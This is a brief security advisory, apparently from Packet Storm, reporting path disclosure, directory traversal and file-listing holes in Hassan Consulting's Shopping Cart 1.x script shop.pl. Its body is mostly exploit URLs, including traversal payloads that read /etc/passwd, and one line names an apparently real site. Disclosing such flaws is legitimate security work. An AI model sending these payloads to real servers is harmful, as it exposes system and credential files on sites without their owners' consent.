Hassan Consulting's Shopping Cart Version 1.x (cgi-bin/shop.pl) contains remote vulnerabilities, including directory transversal with file read ability, listing files, and path disclosure. Exploit URL's included.
85283352f70d94548d2b56de0d97bcf80906908ef932baf0b3a815cdc3e97361Hassan Consulting's Shopping Cart Version 1.x
shopping cart issues. Simple Path disclosure, directory transversal with file read ability, and listing of files in all directorys in somecases.
Just depends on version of the code.
VENDOR of SHOP.pl --^ Multiple holes at various patchlevels
<d0tslash> http://www.irata.com/cgi-local/shop2.pl/page=.*
http://www.xxxxxxxxxxx.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd
http://www.xxxxxxxxx/cgi-local/shop.pl/SID=947574241.3380378/page=../
http://www.xxxxxxxx.com/cgi-bin/shop.pl/page=../../../../../../../../etc/passwd
http://www.xxxxxxxx.com/cgi-local/shop.pl/page=./produck_list
http://www.xxxxxxxx.com/cgi-local/shop.pl/page=
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed